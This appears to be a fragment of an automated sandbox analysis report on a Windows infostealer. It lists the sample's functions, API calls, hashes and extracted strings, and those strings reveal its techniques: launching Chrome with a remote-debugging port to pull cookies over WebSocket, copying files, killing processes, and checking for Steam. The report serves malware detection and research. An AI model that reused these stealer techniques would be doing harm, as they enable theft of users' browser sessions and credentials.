                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Process32lstrcat$Close$HandleNextProcessstrlen$CreateDesktopOpenmemset$FirstSnapshotTerminateToolhelp32wsprintf$FolderPathSleepSystemTimelstrcpynlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$%s%s$D
                          • API String ID: 958055206-1862457068
                          • Opcode ID: 21a8a1b049b2d97fd293a175e3e67cf21be045f4bb3ce3a9570584b16c25cb89
                          • Instruction ID: 4b0e34de16c596f65eee158add2dad243c56dcf1612adfc997a4de13671dcc5d
                          • Opcode Fuzzy Hash: 21a8a1b049b2d97fd293a175e3e67cf21be045f4bb3ce3a9570584b16c25cb89
                          • Instruction Fuzzy Hash: 2D916171A10218AFDB10DF64DC89FDE77B9AF48700F1040A9F609A72D1DFB4AA448FA4
                          Function 0041E210 Relevance: 38.7, APIs: 20, Strings: 2, Instructions: 212stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0041E22C
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041E243
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041E263
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041E27D
                          • wsprintfA.USER32 ref: 0041E2A2
                          • StrCmpCA.SHLWAPI(?,0042CFEC), ref: 0041E2B4
                          • wsprintfA.USER32 ref: 0041E2D1
                            • Part of subcall function 0041EDE0: lstrcpy.KERNEL32(00000000,?), ref: 0041EE12
                          • wsprintfA.USER32 ref: 0041E2F0
                          • PathMatchSpecA.SHLWAPI(?,?), ref: 0041E304
                          • lstrcat.KERNEL32(?,00FBE558), ref: 0041E335
                          • lstrcat.KERNEL32(?,00431794), ref: 0041E347
                          • lstrcat.KERNEL32(?,?), ref: 0041E358
                          • lstrcat.KERNEL32(?,00431794), ref: 0041E36A
                          • lstrcat.KERNEL32(?,?), ref: 0041E37E
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0041E394
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E3D2
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041E422
                          • DeleteFileA.KERNEL32(?), ref: 0041E45C
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041E49B
                          • FindClose.KERNEL32(00000000), ref: 0041E4AA
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$Filewsprintf$Find$CloseCopyDeleteFirstMatchNextPathSpec
                          • String ID: %s\%s$%s\*
                          • API String ID: 1375681507-2848263008
                          • Opcode ID: 4a2eccff4615c3cd6f1c7582e7166ff7a4d4baf4555253d0c23705893c154f32
                          • Instruction ID: 0ebf8fa3b60a6a6c73fa557e706a9dc2010bfe5bc69f4f11cfc7a73c4dbc13c7
                          • Opcode Fuzzy Hash: 4a2eccff4615c3cd6f1c7582e7166ff7a4d4baf4555253d0c23705893c154f32
                          • Instruction Fuzzy Hash: B5819771A002189FCB20EF75DD49AEF7779BF44300F0455A9B90693191DF78AA44CFA4
                          Function 004016B9 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 219stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004016E2
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 00401719
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0040176C
                          • lstrcat.KERNEL32(00000000), ref: 00401776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004017A2
                          • lstrcpy.KERNEL32(00000000,?), ref: 004018F3
                          • lstrcat.KERNEL32(00000000,00000000), ref: 004018FE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat
                          • String ID: \*.*
                          • API String ID: 2276651480-1173974218
                          • Opcode ID: c4b74769114b713f627fa1af7ac0ecb7a329170a52fe1645dd556dd1b1344424
                          • Instruction ID: cd06a09a0fb4a9f553eb0f322cadc50c1285817f96e15c4172f0039c12c8fe68
                          • Opcode Fuzzy Hash: c4b74769114b713f627fa1af7ac0ecb7a329170a52fe1645dd556dd1b1344424
                          • Instruction Fuzzy Hash: AA814071A102169BCB21EF69DD89AAF77B5AF44304F04113AF805B72E1CB789D05CFA9
                          Function 0041DD30 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 171stringfilememoryCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 0041DD45
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0041DD4C
                          • wsprintfA.USER32 ref: 0041DD62
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041DD79
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041DD9C
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041DDB6
                          • wsprintfA.USER32 ref: 0041DDD4
                          • DeleteFileA.KERNEL32(?), ref: 0041DE20
                          • CopyFileA.KERNEL32(?,?,00000001), ref: 0041DDED
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401557
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 00401579
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 0040159B
                            • Part of subcall function 00401530: lstrcpy.KERNEL32(00000000,?), ref: 004015FF
                            • Part of subcall function 0041D980: memset.MSVCRT ref: 0041D9A1
                            • Part of subcall function 0041D980: memset.MSVCRT ref: 0041D9B3
                            • Part of subcall function 0041D980: SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 0041D9DB
                            • Part of subcall function 0041D980: lstrcpy.KERNEL32(00000000,?), ref: 0041DA0E
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,00000000), ref: 0041DA1C
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,00FBE020), ref: 0041DA36
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,?), ref: 0041DA4A
                            • Part of subcall function 0041D980: lstrcat.KERNEL32(?,00FBCF80), ref: 0041DA5E
                            • Part of subcall function 0041D980: lstrcpy.KERNEL32(00000000,?), ref: 0041DA8E
                            • Part of subcall function 0041D980: GetFileAttributesA.KERNEL32(00000000), ref: 0041DA95
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041DE2E
                          • FindClose.KERNEL32(00000000), ref: 0041DE3D
                          • lstrcat.KERNEL32(?,00FBE558), ref: 0041DE66
                          • lstrcat.KERNEL32(?,00FBD888), ref: 0041DE7A
                          • lstrlen.KERNEL32(?), ref: 0041DE84
                          • lstrlen.KERNEL32(?), ref: 0041DE92
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041DED2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                          • String ID: %s\%s$%s\*
                          • API String ID: 4184593125-2848263008
                          • Opcode ID: 02361839c3335e14677988f495c9c60b2613d832e63fee47048b7607bb187ef6
                          • Instruction ID: 8e765018a87a922bf1a7945002e3e7802f3d07d980159455bd21fa8f0dbe841d
                          • Opcode Fuzzy Hash: 02361839c3335e14677988f495c9c60b2613d832e63fee47048b7607bb187ef6
                          • Instruction Fuzzy Hash: 6A615271A10208AFCB14EF74DD89AEE77B9BF48304F0045A9B506A7291DF78AA44CF94
                          Function 0041D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • wsprintfA.USER32 ref: 0041D54D
                          • FindFirstFileA.KERNEL32(?,?), ref: 0041D564
                          • StrCmpCA.SHLWAPI(?,004317A0), ref: 0041D584
                          • StrCmpCA.SHLWAPI(?,004317A4), ref: 0041D59E
                          • lstrcat.KERNEL32(?,00FBE558), ref: 0041D5E3
                          • lstrcat.KERNEL32(?,00FBE448), ref: 0041D5F7
                          • lstrcat.KERNEL32(?,?), ref: 0041D60B
                          • lstrcat.KERNEL32(?,?), ref: 0041D61C
                          • lstrcat.KERNEL32(?,00431794), ref: 0041D62E
                          • lstrcat.KERNEL32(?,?), ref: 0041D642
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041D682
                          • lstrcpy.KERNEL32(00000000,?), ref: 0041D6D2
                          • FindNextFileA.KERNEL32(00000000,?), ref: 0041D737
                          • FindClose.KERNEL32(00000000), ref: 0041D746
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 50252434-4073750446
                          • Opcode ID: 44c44d3d5a429963cdbbbe44b561e65687e71cf8a3ef74131a8121fdbe04ad55
                          • Instruction ID: d6332d1f3379cec880f4289751697fa87a54eef7f15c0f025c7746e4ec670789
                          • Opcode Fuzzy Hash: 44c44d3d5a429963cdbbbe44b561e65687e71cf8a3ef74131a8121fdbe04ad55
                          • Instruction Fuzzy Hash: B96187B1E102199FCB10EF74DD88ADE77B5EF48304F0054A9F549A3290DB78AA44CF94
                          Function 004248B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Xinvalid_argumentstd::_
                          • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                          • API String ID: 909987262-758292691
                          • Opcode ID: 56a04f1eb05b034cab75dcfc36c9d33e9f8efd01f4268ea83902ab4082dd2414
                          • Instruction ID: 05e3be9d33a30296401f404f65a7cedce3420285136b0224518c6eb8c190ad0c
                          • Opcode Fuzzy Hash: 56a04f1eb05b034cab75dcfc36c9d33e9f8efd01f4268ea83902ab4082dd2414
                          • Instruction Fuzzy Hash: 04A26A71E01229DFDB10DFA8D9407EDBBB6AF88304F5481AAD508A7381DB745E85CF94
                          Function 004123A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0042CFEC), ref: 004123D4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 004123F7
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00412402
                          • lstrlen.KERNEL32(\*.*), ref: 0041240D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041242A
                          • lstrcat.KERNEL32(00000000,\*.*), ref: 00412436
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0041246A
                          • FindFirstFileA.KERNEL32(00000000,?), ref: 00412486
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                          • String ID: \*.*
                          • API String ID: 2567437900-1173974218
                          • Opcode ID: 5606a01231798ee82edad9dfca8401c1de57e1125b12495288f1a07e3e415015
                          • Instruction ID: 37ad96a8048201130d174f68a748bc82764b04fc949853bab6f79276fc789aa1
                          • Opcode Fuzzy Hash: 5606a01231798ee82edad9dfca8401c1de57e1125b12495288f1a07e3e415015
                          • Instruction Fuzzy Hash: 874152307102158BC722EF29DE89ADF73A5AF14308F00513AB849E72E1CFB89C458F98
                          Function 004246A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 004246B9
                          • Process32First.KERNEL32(00000000,00000128), ref: 004246C9
                          • Process32Next.KERNEL32(00000000,00000128), ref: 004246DB
                          • StrCmpCA.SHLWAPI(?,?), ref: 004246ED
                          • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00424702
                          • TerminateProcess.KERNEL32(00000000,00000000), ref: 00424711
                          • CloseHandle.KERNEL32(00000000), ref: 00424718
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00424726
                          • CloseHandle.KERNEL32(00000000), ref: 00424731
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                          • String ID:
                          • API String ID: 3836391474-0
                          • Opcode ID: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                          • Instruction ID: c0af82d2220ffa974d571ce9e7a5dccbaa51854a96d9eb04d24fe49588ec8ce6
                          • Opcode Fuzzy Hash: 31794d220843fc32869daf0815515cd9fdb01cafa73083098f7cfc23eab11e6d
                          • Instruction Fuzzy Hash: 4101A1316012246BE7205B60AC88FFB777DEB85B41F00009DF90592180EFB899408EB4
                          Function 00424610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00424628
                          • Process32First.KERNEL32(00000000,00000128), ref: 00424638
                          • Process32Next.KERNEL32(00000000,00000128), ref: 0042464A
                          • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00424660
                          • Process32Next.KERNEL32(00000000,00000128), ref: 00424672
                          • CloseHandle.KERNEL32(00000000), ref: 0042467D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1521331676.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1521224807.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000437000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000496000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.00000000004AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521331676.0000000000638000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521570414.000000000064A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.000000000064C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000007D7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008D9000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521591445.00000000008EF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1521929817.00000000008F0000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522093799.0000000000A8B000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1522114663.0000000000A8C000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                          Yara matches
                          Similarity
